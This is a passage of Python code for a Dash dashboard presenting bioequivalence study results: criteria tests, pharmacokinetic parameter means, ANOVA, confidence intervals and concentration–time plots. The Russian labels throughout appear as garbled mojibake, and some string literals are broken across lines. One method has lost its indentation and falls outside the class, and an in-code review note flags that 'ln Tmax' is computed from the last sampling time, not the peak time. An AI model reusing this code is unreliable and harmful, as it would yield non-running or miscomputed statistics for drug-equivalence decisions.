                                 'ะะพะปะผะพะณะพัะพะฒะฐ-ะกะผะธัะฝะพะฒะฐ'],
                    'ะัะฑะพัะบะธ': ['ะะตัะฒะฐั ะธ ะฒัะพัะฐั ะณััะฟะฟั',
                                'ะะตัะธะพะด 1 ะธ ะฟะตัะธะพะด 2', 'ะะตัะฒะฐั ะณััะฟะฟะฐ ัะตััะพะฒัะน ะฟัะตะฟะฐัะฐั', 'ะะตัะฒะฐั ะณััะฟะฟะฐ ัะตัะตัะตะฝัะฝัะน ะฟัะตะฟะฐัะฐั',
                                'ะัะพัะฐั ะณััะฟะฟะฐ ัะตััะพะฒัะน ะฟัะตะฟะฐัะฐั', 'ะัะพัั ะณััะฟะฟะฐ ัะตัะตัะตะฝัะฝัะน ะฟัะตะฟะฐัะฐั'],
                    'ะะฝะฐัะตะฝะธะต ะบัะธัะตัะธั': [self.settings[0].bartlett_groups[0],
                                          self.settings[0].bartlett_period[0], self.settings[0].kstest_t_1[0],
                                          self.settings[0].kstest_r_1[0], self.settings[0].kstest_t_2[0], self.settings[0].kstest_r_2[0]],
                    'p-ััะพะฒะตะฝั': [self.settings[0].bartlett_groups[1],
                                  self.settings[0].bartlett_period[1], self.settings[0].kstest_t_1[1],
                                  self.settings[0].kstest_r_1[1], self.settings[0].kstest_t_2[1], self.settings[0].kstest_r_2[1]]}
        else:
            data = {'ะัะธัะตัะธะน': ['ะะฐััะปะตััะฐ', 'ะะฐััะปะตััะฐ', 'ะจะฐะฟะธัะพ-ะฃะธะปะบะฐ', 'ะจะฐะฟะธัะพ-ะฃะธะปะบะฐ', 'ะจะฐะฟะธัะพ-ะฃะธะปะบะฐ',
                                 'ะจะฐะฟะธัะพ-ะฃะธะปะบะฐ'],
                    'ะัะฑะพัะบะธ': ['ะะตัะฒะฐั ะธ ะฒัะพัะฐั ะณััะฟะฟั',
                                'ะะตัะธะพะด 1 ะธ ะฟะตัะธะพะด 2', 'ะะตัะฒะฐั ะณััะฟะฟะฐ ัะตััะพะฒัะน ะฟัะตะฟะฐัะฐั', 'ะะตัะฒะฐั ะณััะฟะฟะฐ ัะตัะตัะตะฝัะฝัะน ะฟัะตะฟะฐัะฐั',
                                'ะัะพัะฐั ะณััะฟะฟะฐ ัะตััะพะฒัะน ะฟัะตะฟะฐัะฐั', 'ะัะพัั ะณััะฟะฟะฐ ัะตัะตัะตะฝัะฝัะน ะฟัะตะฟะฐัะฐั'],
                    'ะะฝะฐัะตะฝะธะต ะบัะธัะตัะธั': [self.settings[0].bartlett_groups[0],
                                          self.settings[0].bartlett_period[0], self.settings[0].shapiro_t_1[0],
                                          self.settings[0].shapiro_r_1[0], self.settings[0].shapiro_t_2[0], self.settings[0].shapiro_r_2[0]],
                    'p-ััะพะฒะตะฝั': [self.settings[0].bartlett_groups[1],
                                  self.settings[0].bartlett_period[1], self.settings[0].shapiro_t_1[1],
                                  self.settings[0].shapiro_r_1[1], self.settings[0].shapiro_t_2[1], self.settings[0].shapiro_r_2[1]]}
        df = pd.DataFrame(data)
        df = round_df(df)
        # Same layout as the parallel branch, with the samples column.
        return html.Div([html.Div(html.H1(children='ะัะฟะพะปะฝะตะฝะธะต ะบัะธัะตัะธะตะฒ'),
                                  style={'text-align': 'center'}),
                         html.Div([
                             html.Div([
                                 html.Div([dash_table.DataTable(
                                     id='criteria',
                                     columns=[{"name": i, "id": i, "deletable": True}
                                              for i in df.columns],
                                     data=df.to_dict('records'),
                                     style_cell_conditional=[
                                         {'if': {'column_id': 'ะัะธัะตัะธะน'},
                                          'width': '25%'},
                                         {'if': {'column_id': 'ะัะฑะพัะบะธ'},
                                          'width': '25%'},
                                         {'if': {'column_id': 'ะะฝะฐัะตะฝะธะต ะบัะธัะตัะธั'},
                                          'width': '25%'},
                                         {'if': {'column_id': 'p-ััะพะฒะตะฝั'},
                                          'width': '25%'},
                                     ],
                                     style_table={'overflowX': 'auto'},
                                     export_format='xlsx'
                                 )], style={'border-color': 'rgb(220, 220, 220)',
                                            'border-style': 'solid', 'padding': '5px', 'margin': '5px'})],
                                 style={'width': '78%', 'display': 'inline-block'}),
                             html.Div(dcc.Markdown(children=markdown_text_criteria), style={
                                 'width': '18%', 'float': 'right', 'display': 'inline-block'})
                         ])
                         ], style={'margin': '50px'}
                        )
    def _generate_param(self):
        """Dash layout section: table of mean key PK parameters per drug group.

        Rows are the two drug groups (R = reference, T = test); columns are
        means over subjects of AUC, AUC to infinity, their log variants, and
        log-transformed Tmax / Cmax taken from the concentration matrices.

        Returns an ``html.Div`` with the data table (xlsx export enabled)
        and an explanatory markdown side panel.

        NOTE(review): 'ln Tmax' is computed as log of ``columns.max()`` —
        i.e. the log of the LAST sampling time, not the time of peak
        concentration. Confirm this is intended.
        """
        data = {'ะััะฟะฟะฐ': ['R', 'T'],
                'AUC': [float(np.mean(self.settings[0].auc_r_notlog)),
                        float(np.mean(self.settings[0].auc_t_notlog))],
                'AUC_inf': [float(np.mean(self.settings[0].auc_r_infty)),
                            float(np.mean(self.settings[0].auc_t_infty))],
                'ln AUC': [float(np.mean(self.settings[0].auc_r)), float(np.mean(self.settings[0].auc_t))],
                'ln AUC_inf': [float(np.mean(self.settings[0].auc_r_infty_log)),
                               float(np.mean(self.settings[0].auc_t_infty_log))],
                'ln Tmax': [float(np.log(self.settings[0].concentration_r.columns.max())),
                            float(np.log(self.settings[0].concentration_t.columns.max()))],
                'ln Cmax': [float(np.log(self.settings[0].concentration_r.max().max())),
                            float(np.log(self.settings[0].concentration_t.max().max()))]}
        df = pd.DataFrame(data)
        # Project helper defined elsewhere in this file: rounds numeric
        # cells for display.
        df = round_df(df)
        return html.Div([html.Div(html.H1(children='ะขะฐะฑะปะธัะฐ ั ัะฐัะฟัะตะดะตะปะตะฝะธะตะผ ะบะปััะตะฒัั
ะฟะฐัะฐะผะตััะพะฒ ะฟะพ ะณััะฟะฟะฐะผ'),
                                  style={'text-align': 'center'}),
                         html.Div([
                             html.Div([
                                 html.Div([dash_table.DataTable(
                                     id='param',
                                     columns=[{"name": i, "id": i, "deletable": True}
                                              for i in df.columns],
                                     data=df.to_dict('records'),
                                     style_table={'overflowX': 'auto'},
                                     export_format='xlsx'
                                 )], style={'border-color': 'rgb(220, 220, 220)',
                                            'border-style': 'solid', 'padding': '5px', 'margin': '5px'})],
                                 style={'width': '68%', 'display': 'inline-block'}),
                             html.Div(dcc.Markdown(children=markdown_text_param),
                                      style={'width': '28%', 'float': 'right', 'display': 'inline-block',
                                             'padding': '5px', 'margin': '5px'})
                         ])
                         ], style={'margin': '50px'}
                        )
def _generate_log_auc(self):
data = {'ะััะฟะฟะฐ': ['TR', 'RT'],
'ln AUC T': [float(np.mean(self.settings[0].auc_t_1)), float(np.mean(self.settings[0].auc_t_2))],
'ln AUC R': [float(np.mean(self.settings[0].auc_r_1)), float(np.mean(self.settings[0].auc_r_2))]}
df = pd.DataFrame(data)
df = round_df(df)
return html.Div([html.Div(html.H1(children='ะกัะตะดะฝะธะต ะฟะปะพัะฐะดะธ ะฟะพะด ะณัะฐัะธะบะพะผ ะฟะพ ะบะฐะถะดะพะผั ะฟัะตะฟะฐัะฐัั'),
style={'text-align': 'center'}),
html.Div([
html.Div([
html.Div([dash_table.DataTable(
id='param',
columns=[{"name": i, "id": i, "deletable": True}
for i in df.columns],
data=df.to_dict('records'),
style_table={'overflowX': 'auto'},
export_format='xlsx'
)], style={'border-color': 'rgb(220, 220, 220)',
'border-style': 'solid', 'padding': '5px', 'margin': '5px'})],
style={'width': '78%', 'display': 'inline-block'}),
html.Div(dcc.Markdown(children=markdown_text_log_auc), style={
'width': '18%', 'float': 'right', 'display': 'inline-block'})
])
], style={'margin': '50px'}
)
    def _generate_anova(self):
        """Dash layout section: ANOVA results table.

        For a parallel study plan (``settings[0].plan == 'parallel'``) the
        classic one-way ANOVA table (``anova[0]``) is shown; otherwise the
        two-factor ANOVA for the crossover design (``anova``). Heading text,
        markdown help panel and top margin differ between the two variants.
        """
        if self.settings[0].plan == 'parallel':
            df = self.settings[0].anova[0]
            mark = markdown_text_anova
            heading = 'ะ ะตะทัะปััะฐัั ะบะปะฐััะธัะตัะบะพะณะพ ะดะธัะฟะตััะธะพะฝะฝะพะณะพ ะฐะฝะฐะปะธะทะฐ'
            marg = '250px'
        else:
            df = self.settings[0].anova
            mark = markdown_text_anova_cross
            heading = 'ะ ะตะทัะปััะฐัั ะดะฒัั
ัะฐะบัะพัะฝะพะณะพ ะดะธัะฟะตััะธะพะฝะฝะพะณะพ ะฐะฝะฐะปะธะทะฐ'
            marg = '50px'
        df = round_df(df)
        return html.Div([html.Div(html.H1(children=heading), style={'text-align': 'center'}),
                         html.Div([
                             html.Div([
                                 html.Div([dash_table.DataTable(
                                     id='anova',
                                     columns=[{"name": i, "id": i, "deletable": True}
                                              for i in df.columns],
                                     data=df.to_dict('records'),
                                     # Equal 20% widths for the five standard ANOVA columns.
                                     style_cell_conditional=[
                                         {'if': {'column_id': 'SS'},
                                          'width': '20%'},
                                         {'if': {'column_id': 'df'},
                                          'width': '20%'},
                                         {'if': {'column_id': 'MS'},
                                          'width': '20%'},
                                         {'if': {'column_id': 'F'},
                                          'width': '20%'},
                                         {'if': {'column_id': 'F ะบัะธั.'},
                                          'width': '20%'}
                                     ],
                                     style_table={'overflowX': 'auto'},
                                     export_format='xlsx'
                                 )], style={'border-color': 'rgb(220, 220, 220)',
                                            'border-style': 'solid', 'padding': '5px', 'margin': '5px'})],
                                 style={'width': '78%', 'display': 'inline-block'}),
                             html.Div(dcc.Markdown(children=mark), style={
                                 'width': '18%', 'float': 'right', 'display': 'inline-block'})
                         ])
                         ], style={'margin': '50px', 'margin-top': marg}
                        )
    def _generate_interval(self):
        """Dash layout section: bioequivalence confidence-interval results.

        Back-transforms the one-sided log-scale bounds with ``e**x`` into
        percentages and checks them against the standard 80.00-125.00%
        acceptance range. The threshold 0.223 is approximately ln(1.25)
        (and -0.223 is approximately ln(0.8)), i.e. the log-scale
        equivalents of the acceptance limits.
        """
        data = {'ะัะธัะตัะธะน': ['ะะธะพัะบะฒะธะฒะฐะปะตะฝัะฝะพััะธ', 'ะะธะพะฝะตัะบะฒะธะฒะฐะปะตะฝัะฝะพััะธ'],
                'ะะธะถะฝัั ะณัะฐะฝะธัะฐ': [100 * (e**self.settings[0].oneside_eq[0]), 100 * (e**self.settings[0].oneside_noteq[0])],
                'ะะตัั
ะฝัั ะณัะฐะฝะธัะฐ': [100 * (e**self.settings[0].oneside_eq[1]), 100 * (e**self.settings[0].oneside_noteq[1])],
                'ะะพะฒะตัะธัะตะปัะฝัะน ะธะฝัะตัะฒะฐะป ะบัะธัะตัะธั': ['80.00-125.00%', '80.00-125.00%'],
                'ะัะฟะพะปะฝะตะฝะธะต ะบัะธัะตัะธั': ['ะัะฟะพะปะฝะตะฝ' if (self.settings[0].oneside_eq[0] > -0.223 and
                                                    self.settings[0].oneside_eq[1] < 0.223) else 'ะะต ะฒัะฟะพะปะฝะตะฝ',
                                       'ะัะฟะพะปะฝะตะฝ' if (self.settings[0].oneside_noteq[0] > 0.223 or
                                                    self.settings[0].oneside_noteq[1] < -0.223) else 'ะะต ะฒัะฟะพะปะฝะตะฝ']}
        df = pd.DataFrame(data)
        df = round_df(df)
        return html.Div([html.Div(html.H1(children='ะ ะตะทัะปััะฐัั ะพัะตะฝะบะธ ะฑะธะพัะบะฒะธะฒะฐะปะตะฝัะฝะพััะธ'),
                                  style={'text-align': 'center'}),
                         html.Div([
                             html.Div([
                                 html.Div([dash_table.DataTable(
                                     id='interval',
                                     columns=[{"name": i, "id": i, "deletable": True}
                                              for i in df.columns],
                                     data=df.to_dict('records'),
                                     style_table={'overflowX': 'auto'},
                                     export_format='xlsx'
                                 )], style={'border-color': 'rgb(220, 220, 220)',
                                            'border-style': 'solid', 'padding': '5px', 'margin': '5px'})],
                                 style={'width': '78%', 'display': 'inline-block'}),
                             html.Div(dcc.Markdown(children=markdown_text_interval), style={
                                 'width': '18%', 'float': 'right', 'display': 'inline-block'})
                         ])
                         ], style={'margin': '50px', 'margin-top': '150px'}
                        )
    def _generate_concentration_time(self, ref=True):
        """Dash layout section: per-subject concentration/time plot (linear y).

        ref=True renders the reference-drug group (component ids ``*_conc_r``),
        ref=False the test-drug group (``*_conc_t``).

        Side effect: registers a callback on ``self.app`` that redraws the
        figure whenever a different subject is chosen in the dropdown; the
        figure marks the subject's maximum and minimum concentration points.
        """
        if ref:
            df = self.settings[0].concentration_r
            # Columns are sampling time points; rows (index) are subjects.
            time = df.columns
            def update_graph(yaxis_column_name_conc_r):
                # Rebuild the figure for the selected subject.
                fig = go.Figure()
                fig.add_trace(go.Scatter(x=time, y=df.loc[
                    yaxis_column_name_conc_r], name='ะัะฐัะธะบ'))
                fig.add_trace(go.Scatter(x=[time[np.argmax(df.loc[
                    yaxis_column_name_conc_r])]], y = [max(df.loc[
                    yaxis_column_name_conc_r])], mode='markers', name='ะะฐะบัะธะผัะผ',
                    marker=dict(size = 15, color = 'violet')))
                fig.add_trace(go.Scatter(x=[time[np.argmin(df.loc[
                    yaxis_column_name_conc_r])]], y = [min(df.loc[
                    yaxis_column_name_conc_r])], mode='markers', name='ะะธะฝะธะผัะผ',
                    marker=dict(size = 15, color = 'green')))
                fig.update_xaxes(title='ะัะตะผั')
                fig.update_yaxes(title=yaxis_column_name_conc_r,
                                 type='linear')
                return fig
            # Register the callback imperatively (decorator form applied as
            # a plain call) so it can live inside this builder method.
            self.app.callback(dash.dependencies.Output('concentration_time_r', 'figure'),
                              [dash.dependencies.Input('yaxis_column_name_conc_r', 'value')])(update_graph)
            available_indicators = df.index
            return html.Div([html.Div(html.H1(children='ะัะฐัะธะบ ะทะฐะฒะธัะธะผะพััะธ ะบะพะฝัะตะฝััะฐัะธะธ ะพั ะฒัะตะผะตะฝะธ ะณััะฟะฟะฐ ัะตัะตัะตะฝัะฝะพะณะพ ะฟัะตะฟะฐัะฐัะฐ'),
                                      style={'text-align': 'center'}),
                             html.Div([
                                 html.Div([
                                     html.Div([
                                         dcc.Markdown(
                                             children="ะัะฑะตัะธัะต ะฟะพะบะฐะทะฐัะตะปั ะดะปั ะพัะธ ะY:"),
                                         dcc.Dropdown(
                                             id='yaxis_column_name_conc_r',
                                             options=[{'label': i, 'value': i}
                                                      for i in available_indicators],
                                             value=available_indicators[0]
                                         )
                                     ], style={'width': '48%', 'display': 'inline-block'}),
                                 ], style={'padding': '5px'}),
                                 dcc.Graph(id='concentration_time_r')], style={'width': '78%',
                                 'display': 'inline-block', 'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
                             html.Div(dcc.Markdown(children=markdown_text_conc_time_r),
                                      style={'width': '18%', 'float': 'right', 'display': 'inline-block'})],
                            style={'margin': '100px'}
                            )
        else:
            df = self.settings[0].concentration_t
            # Columns are sampling time points; rows (index) are subjects.
            time = df.columns
            def update_graph(yaxis_column_name_conc_t):
                # Rebuild the figure for the selected subject.
                fig = go.Figure()
                fig.add_trace(go.Scatter(x=time, y=df.loc[
                    yaxis_column_name_conc_t], name='ะัะฐัะธะบ'))
                fig.add_trace(go.Scatter(x=[time[np.argmax(df.loc[
                    yaxis_column_name_conc_t])]], y = [max(df.loc[
                    yaxis_column_name_conc_t])], mode='markers', name='ะะฐะบัะธะผัะผ',
                    marker=dict(size = 15, color = 'violet')))
                fig.add_trace(go.Scatter(x=[time[np.argmin(df.loc[
                    yaxis_column_name_conc_t])]], y = [min(df.loc[
                    yaxis_column_name_conc_t])], mode='markers', name='ะะธะฝะธะผัะผ',
                    marker=dict(size = 15, color = 'green')))
                fig.update_xaxes(title='ะัะตะผั')
                fig.update_yaxes(title=yaxis_column_name_conc_t,
                                 type='linear')
                return fig
            self.app.callback(dash.dependencies.Output('concentration_time_t', 'figure'),
                              [dash.dependencies.Input('yaxis_column_name_conc_t', 'value')])(update_graph)
            available_indicators = df.index
            return html.Div([html.Div(html.H1(children='ะัะฐัะธะบ ะทะฐะฒะธัะธะผะพััะธ ะบะพะฝัะตะฝััะฐัะธะธ ะพั ะฒัะตะผะตะฝะธ ะณััะฟะฟะฐ ัะตััะพะฒะพะณะพ ะฟัะตะฟะฐัะฐัะฐ'),
                                      style={'text-align': 'center'}),
                             html.Div([
                                 html.Div([
                                     html.Div([
                                         dcc.Markdown(
                                             children="ะัะฑะตัะธัะต ะฟะพะบะฐะทะฐัะตะปั ะดะปั ะพัะธ ะY:"),
                                         dcc.Dropdown(
                                             id='yaxis_column_name_conc_t',
                                             options=[{'label': i, 'value': i}
                                                      for i in available_indicators],
                                             value=available_indicators[0]
                                         )
                                     ], style={'width': '48%', 'display': 'inline-block'}),
                                 ], style={'padding': '5px'}),
                                 dcc.Graph(id='concentration_time_t')], style={'width': '78%',
                                 'display': 'inline-block', 'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
                             html.Div(dcc.Markdown(children=markdown_text_conc_time_t),
                                      style={'width': '18%', 'float': 'right', 'display': 'inline-block'})],
                            style={'margin': '100px'}
                            )
    def _generate_concentration_time_log(self, ref=True):
        """Dash layout section: per-subject concentration/time plot, log y-axis.

        Identical in structure to ``_generate_concentration_time`` but the
        y-axis is fixed to ``type='log'`` and all component ids carry a
        ``_log`` suffix. ref=True -> reference group, ref=False -> test group.

        Side effect: registers the dropdown-driven redraw callback on
        ``self.app``.
        """
        if ref:
            df = self.settings[0].concentration_r
            # Columns are sampling time points; rows (index) are subjects.
            time = df.columns
            def update_graph(yaxis_column_name_conc_r_log):
                # Rebuild the figure for the selected subject.
                fig = go.Figure()
                fig.add_trace(go.Scatter(x=time, y=df.loc[
                    yaxis_column_name_conc_r_log], name='ะัะฐัะธะบ'))
                fig.add_trace(go.Scatter(x=[time[np.argmax(df.loc[
                    yaxis_column_name_conc_r_log])]], y = [max(df.loc[
                    yaxis_column_name_conc_r_log])], mode='markers', name='ะะฐะบัะธะผัะผ',
                    marker=dict(size = 15, color = 'violet')))
                fig.add_trace(go.Scatter(x=[time[np.argmin(df.loc[
                    yaxis_column_name_conc_r_log])]], y = [min(df.loc[
                    yaxis_column_name_conc_r_log])], mode='markers', name='ะะธะฝะธะผัะผ',
                    marker=dict(size = 15, color = 'green')))
                fig.update_xaxes(title='ะัะตะผั')
                fig.update_yaxes(title=yaxis_column_name_conc_r_log,
                                 type='log')
                return fig
            self.app.callback(dash.dependencies.Output('concentration_time_r_log', 'figure'),
                              [dash.dependencies.Input('yaxis_column_name_conc_r_log', 'value')])(update_graph)
            available_indicators = df.index
            return html.Div([html.Div(html.H1(children='ะัะฐัะธะบ ะทะฐะฒะธัะธะผะพััะธ ะฟัะพะปะพะณะฐัะธัะผะธัะพะฒะฐะฝะฝะพะน ะบะพะฝัะตะฝััะฐัะธะธ ะพั ะฒัะตะผะตะฝะธ ะณััะฟะฟะฐ ัะตัะตัะตะฝัะฝะพะณะพ ะฟัะตะฟะฐัะฐัะฐ'),
                                      style={'text-align': 'center'}),
                             html.Div([
                                 html.Div([
                                     html.Div([
                                         dcc.Markdown(
                                             children="ะัะฑะตัะธัะต ะฟะพะบะฐะทะฐัะตะปั ะดะปั ะพัะธ ะY:"),
                                         dcc.Dropdown(
                                             id='yaxis_column_name_conc_r_log',
                                             options=[{'label': i, 'value': i}
                                                      for i in available_indicators],
                                             value=available_indicators[0]
                                         )
                                     ], style={'width': '48%', 'display': 'inline-block'}),
                                 ], style={'padding': '5px'}),
                                 dcc.Graph(id='concentration_time_r_log')], style={'width': '78%',
                                 'display': 'inline-block', 'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
                             html.Div(dcc.Markdown(children=markdown_text_conc_time_r_log),
                                      style={'width': '18%', 'float': 'right', 'display': 'inline-block'})],
                            style={'margin': '100px'}
                            )
        else:
            df = self.settings[0].concentration_t
            # Columns are sampling time points; rows (index) are subjects.
            time = df.columns
            def update_graph(yaxis_column_name_conc_t_log):
                # Rebuild the figure for the selected subject.
                fig = go.Figure()
                fig.add_trace(go.Scatter(x=time, y=df.loc[
                    yaxis_column_name_conc_t_log], name='ะัะฐัะธะบ'))
                fig.add_trace(go.Scatter(x=[time[np.argmax(df.loc[
                    yaxis_column_name_conc_t_log])]], y = [max(df.loc[
                    yaxis_column_name_conc_t_log])], mode='markers', name='ะะฐะบัะธะผัะผ',
                    marker=dict(size = 15, color = 'violet')))
                fig.add_trace(go.Scatter(x=[time[np.argmin(df.loc[
                    yaxis_column_name_conc_t_log])]], y = [min(df.loc[
                    yaxis_column_name_conc_t_log])], mode='markers', name='ะะธะฝะธะผัะผ',
                    marker=dict(size = 15, color = 'green')))
                fig.update_xaxes(title='ะัะตะผั')
                fig.update_yaxes(title=yaxis_column_name_conc_t_log,
                                 type='log')
                return fig
            self.app.callback(dash.dependencies.Output('concentration_time_t_log', 'figure'),
                              [dash.dependencies.Input('yaxis_column_name_conc_t_log', 'value')])(update_graph)
            available_indicators = df.index
            return html.Div([html.Div(html.H1(children='ะัะฐัะธะบ ะทะฐะฒะธัะธะผะพััะธ ะฟัะพะปะพะณะฐัะธัะผะธัะพะฒะฐะฝะฝะพะน ะบะพะฝัะตะฝััะฐัะธะธ ะพั ะฒัะตะผะตะฝะธ ะณััะฟะฟะฐ ัะตััะพะฒะพะณะพ ะฟัะตะฟะฐัะฐัะฐ'),
                                      style={'text-align': 'center'}),
                             html.Div([
                                 html.Div([
                                     html.Div([
                                         dcc.Markdown(
                                             children="ะัะฑะตัะธัะต ะฟะพะบะฐะทะฐัะตะปั ะดะปั ะพัะธ ะY:"),
                                         dcc.Dropdown(
                                             id='yaxis_column_name_conc_t_log',
                                             options=[{'label': i, 'value': i}
                                                      for i in available_indicators],
                                             value=available_indicators[0]
                                         )
                                     ], style={'width': '48%', 'display': 'inline-block'}),
                                 ], style={'padding': '5px'}),
                                 dcc.Graph(id='concentration_time_t_log')], style={'width': '78%',
                                 'display': 'inline-block', 'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
                             html.Div(dcc.Markdown(children=markdown_text_conc_time_t_log),
                                      style={'width': '18%', 'float': 'right', 'display': 'inline-block'})],
                            style={'margin': '100px'}
                            )
    def _generate_concentration_time_linlog(self, ref=True):
        """Dash layout section: per-subject concentration/time plot with a
        user-selectable linear/log y-axis (RadioItems).

        ref=True -> reference group (ids ``*_conc_r_linlog``), ref=False ->
        test group (``*_conc_t_linlog``).

        Side effect: registers a two-input callback on ``self.app``
        (subject dropdown + axis-type radio buttons).
        """
        if ref:
            df = self.settings[0].concentration_r
            # Columns are sampling time points; rows (index) are subjects.
            time = df.columns
            def update_graph(yaxis_column_name_conc_r_linlog, yaxis_type_conc_r_linlog):
                # Rebuild the figure for the selected subject and axis type.
                fig = go.Figure()
                fig.add_trace(go.Scatter(x=time, y=df.loc[
                    yaxis_column_name_conc_r_linlog], name='ะัะฐัะธะบ'))
                fig.add_trace(go.Scatter(x=[time[np.argmax(df.loc[
                    yaxis_column_name_conc_r_linlog])]], y = [max(df.loc[
                    yaxis_column_name_conc_r_linlog])], mode='markers', name='ะะฐะบัะธะผัะผ',
                    marker=dict(size = 15, color = 'violet')))
                fig.add_trace(go.Scatter(x=[time[np.argmin(df.loc[
                    yaxis_column_name_conc_r_linlog])]], y = [min(df.loc[
                    yaxis_column_name_conc_r_linlog])], mode='markers', name='ะะธะฝะธะผัะผ',
                    marker=dict(size = 15, color = 'green')))
                fig.update_xaxes(title='ะัะตะผั')
                fig.update_yaxes(title=yaxis_column_name_conc_r_linlog,
                                 type=yaxis_type_conc_r_linlog)
                return fig
            self.app.callback(dash.dependencies.Output('concentration_time_r_linlog', 'figure'),
                              [dash.dependencies.Input('yaxis_column_name_conc_r_linlog', 'value'),
                               dash.dependencies.Input('yaxis_type_conc_r_linlog', 'value')])(update_graph)
            available_indicators = df.index
            return html.Div([html.Div(html.H1(children='ะัะฐัะธะบ ะทะฐะฒะธัะธะผะพััะธ ะบะพะฝัะตะฝััะฐัะธะธ ะพั ะฒัะตะผะตะฝะธ ะณััะฟะฟะฐ ัะตัะตัะตะฝัะฝะพะณะพ ะฟัะตะฟะฐัะฐัะฐ'),
                                      style={'text-align': 'center'}),
                             html.Div([
                                 html.Div([
                                     html.Div([
                                         dcc.Markdown(
                                             children="ะัะฑะตัะธัะต ะฟะพะบะฐะทะฐัะตะปั ะดะปั ะพัะธ ะY:"),
                                         dcc.Dropdown(
                                             id='yaxis_column_name_conc_r_linlog',
                                             options=[{'label': i, 'value': i}
                                                      for i in available_indicators],
                                             value=available_indicators[0]
                                         )
                                     ], style={'width': '48%', 'display': 'inline-block'}),
                                     html.Div([dcc.RadioItems(
                                         id='yaxis_type_conc_r_linlog',
                                         options=[{'label': i, 'value': i}
                                                  for i in ['linear', 'log']],
                                         value='linear'
                                     )], style={'width': '48%', 'display': 'inline-block', 'float': 'right'})
                                 ], style={'padding': '5px'}),
                                 dcc.Graph(id='concentration_time_r_linlog')], style={'width': '78%',
                                 'display': 'inline-block', 'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
                             html.Div(dcc.Markdown(children=markdown_text_conc_time_r),
                                      style={'width': '18%', 'float': 'right', 'display': 'inline-block'})],
                            style={'margin': '100px'}
                            )
        else:
            df = self.settings[0].concentration_t
            # Columns are sampling time points; rows (index) are subjects.
            time = df.columns
            def update_graph(yaxis_column_name_conc_t_linlog, yaxis_type_conc_t_linlog):
                # Rebuild the figure for the selected subject and axis type.
                fig = go.Figure()
                fig.add_trace(go.Scatter(x=time, y=df.loc[
                    yaxis_column_name_conc_t_linlog], name='ะัะฐัะธะบ'))
                fig.add_trace(go.Scatter(x=[time[np.argmax(df.loc[
                    yaxis_column_name_conc_t_linlog])]], y = [max(df.loc[
                    yaxis_column_name_conc_t_linlog])], mode='markers', name='ะะฐะบัะธะผัะผ',
                    marker=dict(size = 15, color = 'violet')))
                fig.add_trace(go.Scatter(x=[time[np.argmin(df.loc[
                    yaxis_column_name_conc_t_linlog])]], y = [min(df.loc[
                    yaxis_column_name_conc_t_linlog])], mode='markers', name='ะะธะฝะธะผัะผ',
                    marker=dict(size = 15, color = 'green')))
                fig.update_xaxes(title='ะัะตะผั')
                fig.update_yaxes(title=yaxis_column_name_conc_t_linlog,
                                 type=yaxis_type_conc_t_linlog)
                return fig
            self.app.callback(dash.dependencies.Output('concentration_time_t_linlog', 'figure'),
                              [dash.dependencies.Input('yaxis_column_name_conc_t_linlog', 'value'),
                               dash.dependencies.Input('yaxis_type_conc_t_linlog', 'value')])(update_graph)
            available_indicators = df.index
            return html.Div([html.Div(html.H1(children='ะัะฐัะธะบ ะทะฐะฒะธัะธะผะพััะธ ะบะพะฝัะตะฝััะฐัะธะธ ะพั ะฒัะตะผะตะฝะธ ะณััะฟะฟะฐ ัะตััะพะฒะพะณะพ ะฟัะตะฟะฐัะฐัะฐ'),
                                      style={'text-align': 'center'}),
                             html.Div([
                                 html.Div([
                                     html.Div([
                                         dcc.Markdown(
                                             children="ะัะฑะตัะธัะต ะฟะพะบะฐะทะฐัะตะปั ะดะปั ะพัะธ ะY:"),
                                         dcc.Dropdown(
                                             id='yaxis_column_name_conc_t_linlog',
                                             options=[{'label': i, 'value': i}
                                                      for i in available_indicators],
                                             value=available_indicators[0]
                                         )
                                     ], style={'width': '48%', 'display': 'inline-block'}),
                                     html.Div([dcc.RadioItems(
                                         id='yaxis_type_conc_t_linlog',
                                         options=[{'label': i, 'value': i}
                                                  for i in ['linear', 'log']],
                                         value='linear'
                                     )], style={'width': '48%', 'display': 'inline-block', 'float': 'right'})
                                 ], style={'padding': '5px'}),
                                 dcc.Graph(id='concentration_time_t_linlog')], style={'width': '78%',
                                 'display': 'inline-block', 'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
                             html.Div(dcc.Markdown(children=markdown_text_conc_time_t),
                                      style={'width': '18%', 'float': 'right', 'display': 'inline-block'})],
                            style={'margin': '100px'}
                            )
    def _generate_concentration_time_cross(self, tr=True):
        """Dash layout section: individual concentration curves for a
        crossover sequence group, drawing the test (T) and reference (R)
        curves for one subject on the same figure.

        tr=True -> sequence TR (``concentration_*_1`` matrices, ids
        ``*_conc_tr``); tr=False -> sequence RT (``concentration_*_2``,
        ids ``*_conc_rt``). Extremes of both curves are marked.

        Side effect: registers a two-input callback on ``self.app``
        (subject dropdown + linear/log radio buttons).
        """
        if tr:
            df_t = self.settings[0].concentration_t_1
            df_r = self.settings[0].concentration_r_1
            # Time points are taken from the T matrix; the R matrix is
            # assumed to share the same sampling grid.
            time = df_t.columns
            def update_graph(yaxis_column_name_conc_tr, yaxis_type_conc_tr):
                # Rebuild both curves for the selected subject.
                fig = go.Figure()
                fig.add_trace(go.Scatter(x=time, y=df_t.loc[
                    yaxis_column_name_conc_tr], name='T'))
                fig.add_trace(go.Scatter(x=time, y=df_r.loc[
                    yaxis_column_name_conc_tr], name='R'))
                fig.add_trace(go.Scatter(x=[time[np.argmax(df_t.loc[
                    yaxis_column_name_conc_tr])]], y = [max(df_t.loc[
                    yaxis_column_name_conc_tr])], mode='markers', name='ะะฐะบัะธะผัะผ T',
                    marker=dict(size = 15, color = 'violet')))
                fig.add_trace(go.Scatter(x=[time[np.argmin(df_t.loc[
                    yaxis_column_name_conc_tr])]], y = [min(df_t.loc[
                    yaxis_column_name_conc_tr])], mode='markers', name='ะะธะฝะธะผัะผ T',
                    marker=dict(size = 15, color = 'green')))
                fig.add_trace(go.Scatter(x=[time[np.argmax(df_r.loc[
                    yaxis_column_name_conc_tr])]], y = [max(df_r.loc[
                    yaxis_column_name_conc_tr])], mode='markers', name='ะะฐะบัะธะผัะผ R',
                    marker=dict(size = 15, color = 'violet')))
